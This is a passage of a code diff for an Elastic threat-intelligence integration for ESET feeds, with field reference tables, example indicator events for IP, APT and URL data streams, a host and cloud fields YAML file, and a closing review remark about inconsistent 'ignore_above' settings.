If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. 
| keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.port | Identifies a threat indicator as a port number (irrespective of direction). | long | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. 
| keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `ip` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:20:06.000Z", + "agent": { + "ephemeral_id": "013ad9c0-d817-4490-a524-0b3f275d2f1a", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.ip", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:20:06.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:22:22.857Z", + "dataset": "ti_eset.ip", + "ingested": "2024-03-27T14:22:34Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:20:06.000Z\",\"description\":\"Web services scanning and attacks\",\"id\":\"indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:20:06.000Z\",\"name\":\"5.2.75.227\",\"pattern\":\"[ipv4-addr:value='5.2.75.227']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:20:06Z\",\"valid_until\":\"2023-10-21T02:20:06Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + 
"forwarded", + "eset-ip" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "5.2.75.227", + "last_seen": "2023-10-19T02:20:06.000Z", + "modified_at": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } +} +``` + +### APT + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. 
When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.category | Event category as defined by MISP. | keyword | +| eset.id | The UID of the event object. | keyword | +| eset.meta_category | Event sub-category as defined by MISP. | keyword | +| eset.name | Human readable name describing the event. | keyword | +| eset.type | Type of the event. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. 
In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. 
It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. 
| keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.email.address | Identifies a threat indicator as an email address (irrespective of direction). | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.file.name | Name of the file including the extension, without the directory. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. 
| match_only_text | +| threat.indicator.url.path | Path of the request, such as "/search". | wildcard | +| threat.indicator.url.port | Port of the request, such as 443. | long | +| threat.indicator.url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| threat.indicator.x509.issuer.common_name | List of common name (CN) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.country | List of country \(C) codes | keyword | +| threat.indicator.x509.issuer.distinguished_name | Distinguished name (DN) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.locality | List of locality names (L) | keyword | +| threat.indicator.x509.issuer.organization | List of organizations (O) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.organizational_unit | List of organizational units (OU) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.state_or_province | List of state or province names (ST, S, or P) | keyword | +| threat.indicator.x509.not_after | Time at which the certificate is no longer considered valid. | date | +| threat.indicator.x509.not_before | Time at which the certificate is first considered valid. | date | +| threat.indicator.x509.serial_number | Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. | keyword | +| threat.indicator.x509.signature_algorithm | Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. | keyword | +| threat.indicator.x509.subject.common_name | List of common names (CN) of subject. 
| keyword | +| threat.indicator.x509.subject.country | List of country \(C) code | keyword | +| threat.indicator.x509.subject.distinguished_name | Distinguished name (DN) of the certificate subject entity. | keyword | +| threat.indicator.x509.subject.locality | List of locality names (L) | keyword | +| threat.indicator.x509.subject.organization | List of organizations (O) of subject. | keyword | +| threat.indicator.x509.subject.organizational_unit | List of organizational units (OU) of subject. | keyword | +| threat.indicator.x509.subject.state_or_province | List of state or province names (ST, S, or P) | keyword | +| threat.indicator.x509.version_number | Version of x509 format. | keyword | + + +An example event for `apt` looks as following: + +```json +{ + "@timestamp": "2023-09-29T08:48:42.000Z", + "agent": { + "ephemeral_id": "aca3c3ca-0233-4da9-aa4d-67883702e60b", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.apt", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:42.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:17:00.528Z", + "dataset": "ti_eset.apt", + "ingested": "2024-03-27T14:17:10Z", + "kind": "enrichment", + "original": 
"{\"created\":\"2023-09-29T08:48:42.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"file\"}],\"labels\":[\"misp:name=\\\"file\\\"\",\"misp:meta-category=\\\"file\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2023-09-29T08:48:42.000Z\",\"pattern\":\"[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-09-26T07:00:04Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-apt" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7196b26572d2c357a17599b9a0d71d33", + "sha1": "a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0", + "sha256": "6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e" + }, + "name": "KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3" + }, + "last_seen": "2023-09-29T08:48:42.000Z", + 
"modified_at": "2023-09-29T08:48:42.000Z", + "provider": "eset", + "type": "file" + } + } +} +``` + +### URL + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. 
| date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. 
The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. 
| keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. 
| date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `url` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:13.000Z", + "agent": { + "ephemeral_id": "47910f1c-df41-4011-adb3-74b1ad882384", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.url", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--8986619a-150b-453c-aaa8-bfe8694d05cc", + "labels": [ + "benign" + ], + "valid_until": "2023-10-21T02:00:13.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:23:28.010Z", + "dataset": "ti_eset.url", + "ingested": "2024-03-27T14:23:40Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:13.000Z\",\"description\":\"Host actively distributes high-severity threat in the form of executable 
code.\",\"id\":\"indicator--8986619a-150b-453c-aaa8-bfe8694d05cc\",\"labels\":[\"benign\"],\"modified\":\"2023-10-19T02:00:13.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:13Z\",\"valid_until\":\"2023-10-21T02:00:13Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-url" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-19T02:00:13.000Z", + "modified_at": "2023-10-19T02:00:13.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://example.com/some/path" + } + } + } +} +``` \ No newline at end of file diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/agent.yml 
@@ -0,0 +1,201 @@
+- name: cloud
+ title: Cloud
+ group: 2
+ description: Fields related to the cloud or infrastructure the events are coming from.
+ footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.'
+ type: group
+ fields:
+ - name: account.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment.
+
+ Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.'
+ example: 666777888999
+ - name: availability_zone
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Availability zone in which this host is running.
+ example: us-east-1c
+ - name: instance.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance ID of the host machine.
+ example: i-1234567890abcdef0
+ - name: instance.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance name of the host machine.
+ - name: machine.type
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Machine type of the host machine.
+ example: t2.medium
+ - name: provider
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean.
+ example: aws
+ - name: region
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Region in which this host is running.
+ example: us-east-1
+ - name: project.id
+ type: keyword
+ description: Name of the project in Google Cloud.
+ - name: image.id
+ type: keyword
+ description: Image ID for the cloud instance.
+- name: container
+ title: Container
+ group: 2
+ description: 'Container fields are used for meta information about the specific container that is the source of information.
+
+ These fields help correlate data based containers from any runtime.'
+ type: group
+ fields:
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Unique container id.
+ - name: image.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the image the container was built on.
+ - name: labels
+ level: extended
+ type: object
+ object_type: keyword
+ description: Image labels.
+ - name: name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Container name.
+- name: host
+ title: Host
+ group: 2
+ description: 'A host is defined as a general computing instance.
+
+ ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.'
+ type: group
+ fields:
+ - name: architecture
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Operating system architecture.
+ example: x86_64
+ - name: domain
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the domain of which the host is a member.
+
+ For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.'
+ example: CONTOSO
+ default_field: false
+ - name: hostname
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Hostname of the host.
+
+ It normally contains what the `hostname` command returns on the host machine.'
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Unique host id.
+
+ As hostname is not always unique, use values that are meaningful in your environment.
+
+ Example: The current usage of `beat.name`.'
+ - name: ip
+ level: core
+ type: ip
+ description: Host ip addresses.
+ - name: mac
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Host mac addresses.
+ - name: name
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Name of the host.
+
+ It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.'
+ - name: os.family
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: OS family (such as redhat, debian, freebsd, windows).
+ example: debian
+ - name: os.kernel
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system kernel version as a raw string.
+ example: 4.4.0-112-generic
+ - name: os.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ multi_fields:
+ - name: text
+ type: text
+ norms: false
+ default_field: false
+ description: Operating system name, without the version.
+ example: Mac OS X
+ - name: os.platform
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system platform (such centos, ubuntu, windows).
+ example: darwin
+ - name: os.version
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system version as a raw string.
+ example: 10.14.1
+ - name: type
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: 'Type of host.
+
+ For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.'
+ - name: containerized
+ type: boolean
+ description: >
+ If the host is a container.
+
+ - name: os.build
+ type: keyword
+ example: "18D109"
+ description: >
+ OS build information.
+
+ - name: os.codename
+ type: keyword
+ example: "stretch"
+ description: >
+ OS codename, if any.
+
+- name: input.type
+ type: keyword
+ description: Input type.
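Review bot: `cloud.project.id` and `cloud.image.id` at the end of the `cloud` group are declared with only `type: keyword` and a description, while every other keyword in the same group also carries `level` and `ignore_above: 1024`; the same applies to `host.os.build`, `host.os.codename` and `input.type` further down. This is a point of style, not correctness, but a keyword without `ignore_above` accepts values of any length, so the mapping is not uniform across the file. If the omission is intentional (these entries look copied from a different template than the ECS-style ones), a one-line comment such as `# non-ECS additions; no ignore_above by design` would save the next reader from wondering; otherwise adding `ignore_above: 1024` to those five entries keeps the destination mapping consistent.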
